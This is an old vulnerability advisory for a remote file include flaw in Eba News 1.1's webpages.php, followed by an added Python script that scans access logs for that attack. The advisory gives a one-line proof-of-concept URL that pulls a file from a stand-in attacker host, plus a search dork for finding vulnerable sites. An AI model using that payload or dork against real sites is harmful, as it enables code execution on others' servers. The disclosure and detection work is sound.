--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------

Author       : SekoMirza
Date Found   : April 11 2007
Location     : France
// ...
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote

--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Eba News
version     : 1.1
vendor      : http://ebascripts.com/
source url  : http://ebascripts.com/

--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP, which utilizes MySQL as the backend. It provides a friendly user interface with great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found a vulnerable script in admin/public/webpages.php

Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~

"Eba News"

--------------------------------------------------

Solution:
~~~

- Download the new version from the vendor URL

--------------------------------------------------

Shoutz:
~~

~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> www.starhack.org
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno

--------------------------------------------------

Contact:
~~~

Seko[at]se-ko[dot]info

-------------------------------- [ EOF ]----------
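
Added example (not part of the original advisory and not the vendor's code): a log check that flags requests to the script and parameter named above when the parameter value is a remote URL. The access-log format (Apache common/combined) and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter named in the advisory.
TARGET_SCRIPT = "/admin/public/webpages.php"
TARGET_PARAM = "filename"

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, ...), any letter case.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def remote_include_value(log_line):
    """Return the remote URL passed in `filename`, or None if the line is clean."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    # Decode the path so a percent-encoded script name still matches.
    if not unquote(parts.path).lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, as the web server would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == TARGET_PARAM and REMOTE_RE.match(value):
            return value
    return None


# Constructed sample log lines (documentation-range IPs, reserved host name).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Apr/2007:10:00:01 +0000] "GET /eba/admin/public/webpages.php?filename=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Apr/2007:10:00:05 +0000] "GET /eba/admin/public/webpages.php?filename=hTTp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.2 - - [11/Apr/2007:10:01:00 +0000] "GET /eba/admin/public/webpages.php?filename=about.html HTTP/1.1" 200 2048',
    '198.51.100.2 - - [11/Apr/2007:10:02:00 +0000] "GET /eba/index.php?filename=http://example.invalid/x.txt HTTP/1.1" 200 2048',
]


def scan(lines):
    """Return (line_number, value) for every line carrying a remote include value."""
    found = ((n, remote_include_value(l)) for n, l in enumerate(lines, start=1))
    return [(n, v) for n, v in found if v is not None]


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote URL in {TARGET_PARAM} -> {value}")
```

Hits in historical logs for the period before the upgrade are worth reviewing alongside the response size and any outbound connections the web server made at the same time.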